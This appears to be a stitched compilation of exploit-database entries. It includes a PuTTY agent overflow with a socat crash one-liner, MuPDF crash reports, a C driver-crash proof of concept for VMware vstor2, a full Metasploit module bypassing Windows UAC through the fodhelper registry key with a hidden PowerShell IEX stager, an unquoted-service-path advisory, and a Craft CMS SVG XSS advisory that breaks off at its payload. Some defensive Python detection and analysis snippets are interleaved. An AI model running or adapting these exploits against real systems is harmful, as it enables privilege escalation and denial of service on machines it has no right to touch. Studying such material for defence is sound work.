The agent protocol begins every message with a 32-bit length field, which gives the length of the remainder of the message, not including the length field itself. In order to accumulate the entire message including the length field in an internal buffer, PuTTY added 4 to the received length value, to obtain the message length inclusive of everything. This addition was unfortunately missing a check for unsigned integer overflow.

Hence, sending a length field large enough to overflow when 4 is added to it, such as 0xFFFFFFFD, would cause PuTTY to record a value for the total message length (totallen) which was smaller than the amount of data it had already seen (lensofar, which at this point would be 4 bytes for the length field itself). Then, it would assume that the expression totallen-lensofar represented the amount of space it was safe to write into its buffer, but in fact, in the overflowing case, this value would wrap back round to a number just less than 2^32, far larger than the allocated heap block, and PuTTY could be induced to overwrite its heap with data sent by the attacker.

If your server is running Linux or any reasonably similar Unix, and has the socat network utility installed, then you can use this simple proof of concept to determine whether you are affected. Simply run the shell command

(echo -ne '\xFF\xFF\xFF\xFD\x0B'; cat /dev/zero) | socat stdio unix-connect:$SSH_AUTH_SOCK

and PuTTY will crash.
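The arithmetic above, as an added example rather than PuTTY's code: the length prefix from the socat proof of concept is run through the pre-0.68 computation in 32-bit unsigned integers, and through the same computation with the missing overflow check. The names totallen and lensofar follow the text; the heap block size used for comparison is an assumption.

```python
# Added example (not PuTTY's code): the agent-message length arithmetic with
# 32-bit unsigned wraparound, vulnerable and checked. Block size is assumed.
import struct

U32_MASK = 0xFFFFFFFF
LEN_FIELD = 4  # size of the agent protocol's length prefix

# The first four bytes sent by the socat proof of concept above.
POC_HEADER = b"\xFF\xFF\xFF\xFD\x0B"


def space_remaining_vulnerable(header: bytes) -> int:
    """Pre-0.68 computation: totallen = length + 4 with no overflow check, then
    totallen - lensofar as the number of bytes believed safe to write."""
    (length,) = struct.unpack(">I", header[:LEN_FIELD])
    totallen = (length + LEN_FIELD) & U32_MASK   # wraps for length > 0xFFFFFFFB
    lensofar = LEN_FIELD                         # the 4 length bytes already seen
    return (totallen - lensofar) & U32_MASK      # unsigned subtraction wraps as well


def space_remaining_fixed(header: bytes) -> int:
    """Same computation, refusing any length whose +4 would not fit in 32 bits."""
    (length,) = struct.unpack(">I", header[:LEN_FIELD])
    if length > U32_MASK - LEN_FIELD:
        raise ValueError("agent message length 0x%08x overflows when the length "
                         "field is added" % length)
    totallen = length + LEN_FIELD
    lensofar = LEN_FIELD
    return totallen - lensofar


def fixed_rejects(header: bytes) -> bool:
    """True when the checked version refuses the header."""
    try:
        space_remaining_fixed(header)
    except ValueError:
        return True
    return False


def overruns_heap_block(header: bytes, block_size: int) -> bool:
    """Would the pre-0.68 logic write past a heap block of block_size bytes?"""
    return space_remaining_vulnerable(header) > block_size


if __name__ == "__main__":
    print("vulnerable space for PoC header: 0x%08x" % space_remaining_vulnerable(POC_HEADER))
    print("checked version rejects PoC header:", fixed_rejects(POC_HEADER))
    print("overruns a 256-byte block:", overruns_heap_block(POC_HEADER, 256))
```

For 0xFFFFFFFD the wrapped totallen is 1, so totallen-lensofar becomes 0xFFFFFFFD: the "just less than 2^32" figure in the text. The same bound check, placed before the addition rather than after it, is the general pattern for any length-prefixed protocol parser.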

This bug is only exploitable at all if you have enabled SSH agent forwarding, which is turned off by default. Moreover, an attacker able to exploit this bug would already have to be able to connect to the Unix-domain socket representing the forwarded agent connection. Since any attacker with that capability would necessarily already be able to generate signatures with your agent's stored private keys, you should in normal circumstances be defended against this vulnerability by the same precautions you and your operating system were already taking to prevent untrusted people from accessing your SSH agent.

This vulnerability was reported by Tim Kosse, and has been assigned CVE ID CVE-2017-6542.
            
Source: https://bugs.ghostscript.com/show_bug.cgi?id=697500

POC to trigger null pointer dereference (mutool)

After some fuzz testing I found a crashing test case.

Git HEAD: 8eea208e099614487e4bd7cc0d67d91489dae642

To reproduce: mutool convert -F cbz nullptr_fz_paint_pixmap_with_mask -o /dev/null

ASAN:

==1406==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x000000849633 bp 0x7ffdb430c750 sp 0x7ffdb430c620 T0)
==1406==The signal is caused by a READ memory access.
==1406==Hint: address points to the zero page.
    #0 0x849632 in fz_paint_pixmap_with_mask XYZ/mupdf/source/fitz/draw-paint.c:1948:2
    #1 0x60208c in fz_draw_pop_clip XYZ/mupdf/source/fitz/draw-device.c:1618:4
    #2 0x54e716 in fz_pop_clip XYZ/mupdf/source/fitz/device.c:301:3
    #3 0x8fb76f in pdf_grestore XYZ/mupdf/source/pdf/pdf-op-run.c:338:4
    #4 0x901149 in pdf_run_xobject XYZ/mupdf/source/pdf/pdf-op-run.c:1347:5
    #5 0x8ffa0f in begin_softmask XYZ/mupdf/source/pdf/pdf-op-run.c:148:3
    #6 0x8fac2f in pdf_begin_group XYZ/mupdf/source/pdf/pdf-op-run.c:188:23
    #7 0x8fac2f in pdf_show_shade XYZ/mupdf/source/pdf/pdf-op-run.c:219
    #8 0x8fac2f in pdf_run_sh XYZ/mupdf/source/pdf/pdf-op-run.c:1943
    #9 0x92cc20 in pdf_process_keyword XYZ/mupdf/source/pdf/pdf-interpret.c:770:5
    #10 0x929741 in pdf_process_stream XYZ/mupdf/source/pdf/pdf-interpret.c:953:6
    #11 0x92870f in pdf_process_contents XYZ/mupdf/source/pdf/pdf-interpret.c:1043:3
    #12 0x8e9edc in pdf_run_page_contents_with_usage XYZ/mupdf/source/pdf/pdf-run.c:46:3
    #13 0x8e99c7 in pdf_run_page_contents XYZ/mupdf/source/pdf/pdf-run.c:69:3
    #14 0x553e12 in fz_run_page_contents XYZ/mupdf/source/fitz/document.c:318:4
    #15 0x55423b in fz_run_page XYZ/mupdf/source/fitz/document.c:350:2
    #16 0x4e8021 in runpage XYZ/mupdf/source/tools/muconvert.c:67:2
    #17 0x4e7d85 in runrange XYZ/mupdf/source/tools/muconvert.c:83:5
    #18 0x4e76c7 in muconvert_main XYZ/mupdf/source/tools/muconvert.c:165:4
    #19 0x4e6943 in main XYZ/mupdf/source/tools/mutool.c:112:12
    #20 0x7f6d6818a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #21 0x41a218 in _start (XYZ/mupdf/build/debug/mutool+0x41a218)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV XYZ/mupdf/source/fitz/draw-paint.c:1948:2 in fz_paint_pixmap_with_mask
==1406==ABORTING


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42138.zip
            
Source: http://seclists.org/oss-sec/2017/q1/458

Description:
Mujstest, which is part of mupdf, is a scriptable tester for mupdf + js.

A crafted image, posted earlier for another issue, causes a stack-based buffer overflow (an unbounded strcpy into a fixed-size stack buffer in main(), per the trace below).

The complete ASan output:

# mujstest $FILE
==32127==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff29560b00 at pc 0x00000047cbf3 bp 0x7fff29560630 sp 0x7fff2955fde0
WRITE of size 1453 at 0x7fff29560b00 thread T0
    #0 0x47cbf2 in __interceptor_strcpy /tmp/portage/sys-devel/llvm-3.9.1-r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:548
    #1 0x50e903 in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-source/platform/x11/jstest_main.c:358:7
    #2 0x7f68df3c578f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #3 0x41bc18 in _init (/usr/bin/mujstest+0x41bc18)

Address 0x7fff29560b00 is located in stack of thread T0 at offset 1056 in frame
    #0 0x50c45f in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-source/platform/x11/jstest_main.c:293

  This frame has 7 object(s):
    [32, 1056) 'path'
    [1184, 2208) 'text' <== Memory access at offset 1056 partially underflows this variable
    [2336, 2340) 'w' <== Memory access at offset 1056 partially underflows this variable
    [2352, 2356) 'h' <== Memory access at offset 1056 partially underflows this variable
    [2368, 2372) 'x' <== Memory access at offset 1056 partially underflows this variable
    [2384, 2388) 'y' <== Memory access at offset 1056 partially underflows this variable
    [2400, 2404) 'b'
  0x1000652a4160:[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
  0x1000652a4170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000652a4180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000652a4190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000652a41a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000652a41b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==32127==ABORTING

Affected version:
1.10a

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6060

Reproducer:
https://github.com/asarubbo/poc/blob/master/00147-mupdf-mujstest-stackoverflow-main

Timeline:
2017-02-05: bug discovered and reported to upstream
2017-02-17: blog post about the issue
2017-02-17: CVE assigned via cveform.mitre.org

Note:
This bug was found with Address Sanitizer.

Permalink:
https://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overflow-in-main-jstest_main-c


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42139.zip
            
/*
 * Title: NULL pointer dereference vulnerability in vstor2 driver (VMware Workstation Pro/Player)
 * CVE: CVE-2017-4916 (VMSA-2017-0009)
 * Author: Borja Merino (@BorjaMerino)
 * Date: May 18, 2017
 * Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 12 Pro (12.5.5 build-5234757)
 * Affected: VMware Workstation Pro/Player 12.x
 * Description: This p0c produces a BSOD by sending a specific IOCTL code to the vstor2_mntapi20_shared device
 * driver due to a double call to IofCompleteRequest (generating a MULTIPLE_IRP_COMPLETE_REQUESTS bug check)
 */

#include <windows.h>
#include <stdio.h>

/* Open the vstor2 mount-API device and send the IOCTL that the driver completes twice. */
void ioctl_crash(void)
{
	HANDLE hfile;
	const WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared";
	DWORD dummy;
	char reply[0x3FDC];
	/* Only the leading header bytes matter; the rest of the input buffer is zero-filled. */
	char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab";

	hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
	if (hfile == INVALID_HANDLE_VALUE) {
		printf("[-] CreateFileW failed (%lu): is vixDiskMountServer.exe running?\n", GetLastError());
		return;
	}
	/* IOCTL 0x2a002c with a 382-byte input triggers the MULTIPLE_IRP_COMPLETE_REQUESTS bug check. */
	DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL);
	CloseHandle(hfile);
}

/* Start vixDiskMountServer.exe hidden so that the vstor2 device object exists. */
void run_vix(void)
{
	STARTUPINFOW si;
	PROCESS_INFORMATION pi;
	RtlZeroMemory(&si, sizeof(si));
	RtlZeroMemory(&pi, sizeof(pi));
	si.cb = sizeof(si);
	si.dwFlags |= STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_HIDE;
	if (!CreateProcessW(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
		printf("[-] CreateProcessW failed (%lu)\n", GetLastError());
		return;
	}
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
}

int main(void)
{
	run_vix(); /* Comment this out if vixDiskMountServer.exe is already running */
	ioctl_crash();
	return 0;
}
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::Windows::Priv
  include Post::Windows::Registry
  include Post::Windows::Runas

  FODHELPER_DEL_KEY     = "HKCU\\Software\\Classes\\ms-settings".freeze
  FODHELPER_WRITE_KEY   = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
  EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
  EXEC_REG_VAL          = ''.freeze # This maps to "(Default)"
  EXEC_REG_VAL_TYPE     = 'REG_SZ'.freeze
  FODHELPER_PATH        = "%WINDIR%\\System32\\fodhelper.exe".freeze
  CMD_MAX_LEN           = 16383

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'          => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)',
        'Description'   => %q{
          This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
          the current user hive, and inserting a custom command that will get invoked when
          the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC
          flag turned off.

          This module modifies a registry key, but cleans up the key once the payload has
          been invoked.

          The module does not require the architecture of the payload to match the OS. If
          specifying EXE::Custom your DLL should call ExitProcess() after starting your
          payload in a separate process.
        },
        'License'       => MSF_LICENSE,
        'Author'        => [
          'winscriptingblog', # UAC bypass discovery and research
          'amaloteaux', # MSF module
        ],
        'Platform'      => ['win'],
        'SessionTypes'  => ['meterpreter'],
        'Targets'       => [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],
        'DefaultTarget' => 0,
        'References'    => [
          [ 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/' ],
          [ 'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1' ]
        ],
        'DisclosureDate' => 'May 12 2017'
      )
    )
  end

  def check
    if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    commspec = '%COMSPEC%'
    registry_view = REGISTRY_VIEW_NATIVE
    psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"

    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] == ARCH_X64
      if session.arch == ARCH_X86
        # fodhelper.exe is x64 only exe
        commspec = '%WINDIR%\\Sysnative\\cmd.exe'
        if target_arch.first == ARCH_X64
          # We can't use absolute path here as
          # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
          psh_path = "powershell.exe"
        end
      end
      if target_arch.first == ARCH_X86
        # Invoking x86, so switch to SysWOW64
        psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
      end
    else
      # if we're on x86, we can't handle x64 payloads
      if target_arch.first == ARCH_X64
        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
      end
    end

    if !payload.arch.empty? && (payload.arch.first != target_arch.first)
      fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
    end

    # Validate that we can actually do things before we bother
    # doing any more work
    check_permissions!

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    payload_value = rand_text_alpha(8)
    psh_path = expand_path(psh_path)

    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)

    if psh_payload.length > CMD_MAX_LEN
      fail_with(Failure::None, "Payload size should be smaller than #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
    end

    psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
    cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"

    existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
    exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?

    if existing.empty?
      registry_createkey(FODHELPER_WRITE_KEY, registry_view)
    end

    print_status("Configuring payload and stager registry keys ...")
    unless exist_delegate
      registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
    end

    registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
    registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)

    # Calling fodhelper.exe through cmd.exe allows us to launch it from either an x86 or an x64 session arch.
    cmd_path = expand_path(commspec)
    cmd_args = expand_path("/c #{FODHELPER_PATH}")
    print_status("Executing payload: #{cmd_path} #{cmd_args}")

    # We can't use cmd_exec here because it blocks, waiting for a result.
    client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })

    # Wait a couple of seconds to give the payload a chance to fire before cleaning up
    # TODO: fix this up to use something smarter than a timeout?
    Rex::sleep(5)

    handler(client)

    print_status("Cleaning up registry keys ...")
    unless exist_delegate
      registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
    end
    if existing.empty?
      registry_deletekey(FODHELPER_DEL_KEY, registry_view)
    else
      registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
    end
    registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
  end

  def check_permissions!
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

    # Check if you are an admin
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end

    unless is_in_admin_group?
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    print_status('UAC is Enabled, checking level...')
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end
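Detection logic for the footprint this module leaves, as an added Python example that is not part of the module or of the research it cites. It runs over constructed Sysmon-style events (EventID 13 = registry value set, EventID 1 = process create); the SID, host, user, stager path and the random value name are invented. The rules key on the two things the technique cannot avoid: the (Default) and DelegateExecute values being written under the user's ms-settings\shell\open\command key (HKCU writes show up under HKU\<SID> in Sysmon), and the auto-elevated fodhelper.exe sitting between a command-interpreter parent and a spawned interpreter child.

```python
import re

# Constructed sample events in Sysmon field naming. They model what the module
# above does: write DelegateExecute and (Default) under the current user's
# ms-settings handler key, run cmd.exe /c fodhelper.exe, and let fodhelper.exe
# start the hijacked PowerShell command.
USER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"          # made up
HANDLER_KEY = "HKU\\" + USER_SID + "\\Software\\Classes\\ms-settings\\shell\\open\\command"
STAGER = ('C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -nop -w hidden -c '
          '"IEX (Get-ItemProperty -Path HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command '
          '-Name qwertyui).qwertyui"')

EVENTS = [
    {"EventID": 13, "User": "DESKTOP-1\\alice", "Image": "C:\\Users\\alice\\update.exe",
     "TargetObject": HANDLER_KEY + "\\DelegateExecute", "Details": ""},
    {"EventID": 13, "User": "DESKTOP-1\\alice", "Image": "C:\\Users\\alice\\update.exe",
     "TargetObject": HANDLER_KEY + "\\(Default)", "Details": STAGER},
    {"EventID": 1, "User": "DESKTOP-1\\alice", "Image": "C:\\Windows\\System32\\fodhelper.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe", "IntegrityLevel": "High"},
    {"EventID": 1, "User": "DESKTOP-1\\alice",
     "Image": "C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\fodhelper.exe", "IntegrityLevel": "High"},
    # Benign noise: a file-association change and a normal fodhelper launch from the shell UI.
    {"EventID": 13, "User": "DESKTOP-1\\alice", "Image": "C:\\Windows\\explorer.exe",
     "TargetObject": "HKU\\" + USER_SID + "\\Software\\Classes\\.txt\\(Default)", "Details": "txtfile"},
    {"EventID": 1, "User": "DESKTOP-1\\alice", "Image": "C:\\Windows\\System32\\fodhelper.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "IntegrityLevel": "High"},
]

# (Default) or DelegateExecute under any user's ms-settings handler key.
HANDLER_RE = re.compile(
    r"^HKU\\[^\\]+\\Software\\Classes\\ms-settings\\shell\\open\\command\\(\(Default\)|DelegateExecute)$",
    re.IGNORECASE)
INTERPRETERS = ("\\cmd.exe", "\\powershell.exe", "\\wscript.exe", "\\cscript.exe",
                "\\mshta.exe", "\\rundll32.exe")


def _is(path, name):
    """Case-insensitive basename comparison for an image path."""
    return path.rsplit("\\", 1)[-1].lower() == name


def _is_interpreter(path):
    return path.lower().endswith(INTERPRETERS)


def detect_fodhelper_bypass(events):
    """Return (rule, event) pairs for events matching the bypass's footprint."""
    hits = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 13 and HANDLER_RE.match(ev.get("TargetObject", "")):
            hits.append(("ms-settings handler written in a user hive", ev))
        elif eid == 1 and _is(ev.get("ParentImage", ""), "fodhelper.exe") \
                and _is_interpreter(ev.get("Image", "")):
            hits.append(("fodhelper.exe spawned a command interpreter", ev))
        elif eid == 1 and _is(ev.get("Image", ""), "fodhelper.exe") \
                and _is_interpreter(ev.get("ParentImage", "")):
            hits.append(("fodhelper.exe launched by a command interpreter", ev))
    return hits


def suspicious_users(events):
    """Users for whom both a handler write and a fodhelper process event were seen;
    the combination is a far stronger signal than either rule on its own."""
    kinds_by_user = {}
    for rule, ev in detect_fodhelper_bypass(events):
        kinds_by_user.setdefault(ev.get("User"), set()).add(rule.split(" ")[0])
    return sorted(u for u, kinds in kinds_by_user.items()
                  if {"ms-settings", "fodhelper.exe"} <= kinds)


if __name__ == "__main__":
    for rule, ev in detect_fodhelper_bypass(EVENTS):
        print(f"[{rule}] {ev.get('User')} {ev.get('TargetObject') or ev.get('Image')}")
    print("users to investigate:", suspicious_users(EVENTS))
```

Because the module deletes the key a few seconds after the payload fires, the registry event stream, not the live key, is the evidence to keep; the process-tree rules catch the same activity when registry auditing is not enabled.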
            
# Exploit Title: Unquoted Service Path Privilege Escalation - Net Monitor for Employees Pro <= 5.3.4 
# Date: 18/03/2017
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://networklookout.com/
# Version: <= 5.3.4
# CVE: CVE-2017-7180
# Vendor not responding; contacted 18/3/2017

Net Monitor for Employees is an agent-based application for monitoring user machines. Its agent installs itself as a service ("Net Monitor for Employees Agent") with an unquoted service path, running with SYSTEM privileges. This could allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.


C:\Users\Win7>sc qc  "Net Monitor for Employees Agent"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Net Monitor for Employees Agent
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Net Monitor for Employees Pro\bin\nmep_ctrlagentsvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Net Monitor for Employees Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


Successful exploitation requires the local attacker to place an executable at one of the locations Windows tries before the real binary when it resolves the unquoted path (for example C:\Program.exe or C:\Program Files\Net.exe), which in turn requires write access to that directory. On the next service restart or system reboot, the planted binary runs with SYSTEM privileges.
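The path-resolution rule behind this bug class, worked through on the service above as an added Python example (not the advisory's code). It extracts BINARY_PATH_NAME from the `sc qc` output quoted above (embedded here as constructed sample text), decides whether the path is ambiguous, lists the candidate files Windows tries in order, and reports which directories an attacker would need write access to; the same logic applies to the ImagePath value read from the registry.

```python
import ntpath
import re

# Constructed sample: the `sc qc` output shown above, reduced to the relevant lines.
SAMPLE_SC_QC = r"""SERVICE_NAME: Net Monitor for Employees Agent
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Net Monitor for Employees Pro\bin\nmep_ctrlagentsvc.exe
        SERVICE_START_NAME : LocalSystem
"""


def binary_path_from_sc_qc(text):
    """Pull BINARY_PATH_NAME out of `sc qc <service>` output; None if absent."""
    m = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.*?)\s*$", text, re.MULTILINE)
    return m.group(1) if m else None


def is_unquoted_with_spaces(image_path):
    """True when the image path is not wrapped in double quotes and contains a
    space; only such paths are ambiguous to the service control manager."""
    p = image_path.strip()
    return not p.startswith('"') and " " in p


def hijack_candidates(image_path):
    """Files the loader tries, in order, for an unquoted image path with spaces.

    The path is split at every space; a candidate without an extension gets
    .exe appended (CreateProcess semantics). The legitimate binary comes last,
    so every earlier entry is a potential hijack location. Trailing arguments,
    if present, are split the same way. Returns [] for a quoted path."""
    if not is_unquoted_with_spaces(image_path):
        return []
    p = image_path.strip()
    candidates = []
    pos = p.find(" ")
    while pos != -1:
        head = p[:pos]
        if not ntpath.splitext(ntpath.basename(head))[1]:
            head += ".exe"
        candidates.append(head)
        pos = p.find(" ", pos + 1)
    candidates.append(p)
    return candidates


def required_write_dirs(candidates):
    """Directories an attacker must be able to write to in order to plant at
    least one hijack candidate (the final, legitimate path is excluded). On a
    default install the drive root and Program Files are not writable by
    standard users, which is why the advisory says the flaw could only
    potentially be abused: check the ACLs before calling it exploitable."""
    dirs = []
    for c in candidates[:-1]:
        d = ntpath.dirname(c)
        if d not in dirs:
            dirs.append(d)
    return dirs


if __name__ == "__main__":
    path = binary_path_from_sc_qc(SAMPLE_SC_QC)
    print("image path:", path)
    print("unquoted with spaces:", is_unquoted_with_spaces(path))
    for c in hijack_candidates(path):
        print("  tries:", c)
    print("needs write access to one of:", required_write_dirs(hijack_candidates(path)))
```

On a live host, run the candidate list against `icacls` (or `Get-Acl`) for each directory returned by required_write_dirs; the bug is only a privilege escalation where one of them grants write or create-file rights to the attacker's account.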


The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c) BYTECOD3R
            
# Exploit Title: Craft CMS 2.6 - Cross-Site Scripting/Unrestricted File Upload
# Date: 2017-06-08
# Exploit Author: Ahsan Tahir
# Vendor Homepage: https://craftcms.com
# Software Link: http://download.craftcdn.com/craft/2.6/2.6.2981/Craft-2.6.2981.zip
# Version: 2.6
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
# Contact: https://twitter.com/AhsanTahirAT

Release Date:
=============
2017-06-08


Product & Service Introduction:
===============================
Craft is a content-first CMS that aims to make life enjoyable for developers and content managers alike.


Abstract Advisory Information:
==============================
Ahsan Tahir, an independent security researcher discovered a Persistent Cross-Site Scripting Vulnerability through Unrestricted File Upload of SVG file in Craft CMS (v2.6)


Vulnerability Disclosure Timeline:
==================================
2017-06-08: Found the vulnerability.
2017-06-08: Reported to vendor.
2017-06-08: Published.

Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
The security risk of the XSS vulnerability is estimated as medium, with a CVSS count of 3.6.
Exploitation of the persistent XSS web vulnerability requires a low-privileged editor account (permission only to edit news) and only low user interaction.

Files that could carry XSS payloads (HTML, SWF, PHP, etc.) are rejected when uploaded as an image, but SVG is accepted as an image and stored without sanitization. An SVG containing JavaScript is therefore saved and served as-is, and the script executes when the file is opened directly.

The asset is served with the "Content-Type: image/svg+xml; charset=us-ascii" header, so the browser renders it as an SVG document in the site's origin and executes the embedded script.

Successful exploitation of the XSS vulnerability results in persistent phishing attacks, session hijacking, persistent external redirects to malicious sources and persistent manipulation of affected or connected web module context.


Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by a low-privileged editor whose only permission is editing news. After successful exploitation, the editor can use this attack to hijack an admin account, since the script runs in the site's origin for whoever opens the stored SVG.

For a security demonstration, or to reproduce the vulnerability, follow the information and steps below.

Payload (Exploitation): 
<?xml version="1.0" standalone="no"?>
